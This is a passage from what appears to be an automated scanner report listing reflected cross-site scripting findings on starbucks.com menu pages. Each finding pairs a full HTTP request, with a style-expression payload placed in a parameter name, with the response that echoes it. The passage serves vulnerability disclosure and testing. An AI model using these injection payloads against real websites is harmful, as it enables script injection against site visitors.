<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style="x:expression(alert(1))"7da409656c1=1"/>
...[SNIP]...

2.189. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-chai-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eef62"style="x:expression(alert(1))"cb85efc8b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:14 GMT
Connection: close
Content-Length: 42257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style="x:expression(alert(1))"cb85efc8b12=1"/>
...[SNIP]...

2.190. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66681"style%3d"x%3aexpression(alert(1))"aa6c3571345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66681"style="x:expression(alert(1))"aa6c3571345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-green-tea-latte?66681"style%3d"x%3aexpression(alert(1))"aa6c3571345=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:22 GMT
Connection: close
Content-Length: 42181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte?66681"style="x:expression(alert(1))"aa6c3571345=1"/>
...[SNIP]...

2.191. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/orange-blossom

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b3b"style="x:expression(alert(1))"d90ff2f9eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/orange-blossom?69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:25 GMT
Connection: close
Content-Length: 42425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom?69b3b"style="x:expression(alert(1))"d90ff2f9eda=1"/>
...[SNIP]...

2.192. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/passion

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff50"style="x:expression(alert(1))"adbc9364b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/passion?cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:49 GMT
Connection: close
Content-Length: 42330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/passion?cff50"style="x:expression(alert(1))"adbc9364b13=1"/>
...[SNIP]...

2.193. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/refresh

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ec5e"style="x:expression(alert(1))"8df00c156e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/refresh?9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:48 GMT
Connection: close
Content-Length: 42359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/refresh?9ec5e"style="x:expression(alert(1))"8df00c156e8=1"/>
...[SNIP]...

2.194. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2295e"style="x:expression(alert(1))"d67e805d73d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:30 GMT
Connection: close
Content-Length: 42306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style="x:expression(alert(1))"d67e805d73d=1"/>
...[SNIP]...

2.195. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353c7"style%3d"x%3aexpression(alert(1))"a67357be292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c7"style="x:expression(alert(1))"a67357be292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style%3d"x%3aexpression(alert(1))"a67357be292=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:05 GMT
Connection: close
Content-Length: 42111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style="x:expression(alert(1))"a67357be292=1"/>
...[SNIP]...

2.196. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 860c2"style="x:expression(alert(1))"e6b6821f468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:10 GMT
Connection: close
Content-Length: 42243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style="x:expression(alert(1))"e6b6821f468=1"/>
...[SNIP]...

2.197. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b08c"style="x:expression(alert(1))"3cfb7a5dbfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:43 GMT
Connection: close
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style="x:expression(alert(1))"3cfb7a5dbfc=1"/>
...[SNIP]...

2.198. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc369"style="x:expression(alert(1))"2ba0c3d405d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:06 GMT
Connection: close
Content-Length: 42340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style="x:expression(alert(1))"2ba0c3d405d=1"/>
...[SNIP]...

2.199. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de7"style%3d"x%3aexpression(alert(1))"adf0f936755 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81de7"style="x:expression(alert(1))"adf0f936755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style%3d"x%3aexpression(alert(1))"adf0f936755=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:22 GMT
Connection: close
Content-Length: 42131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style="x:expression(alert(1))"adf0f936755=1"/>
...[SNIP]...

2.200. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4bbc"style="x:expression(alert(1))"9b2bce3bcc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:17 GMT
Connection: close
Content-Length: 42522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style="x:expression(alert(1))"9b2bce3bcc9=1"/>
...[SNIP]...

2.201. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/zen

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3af5b"style="x:expression(alert(1))"ab6cdbd263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/zen?3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:42 GMT
Connection: close
Content-Length: 42134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/zen?3af5b"style="x:expression(alert(1))"ab6cdbd263=1"/>
...[SNIP]...

2.202. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d939"style="x:expression(alert(1))"080e74fafa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
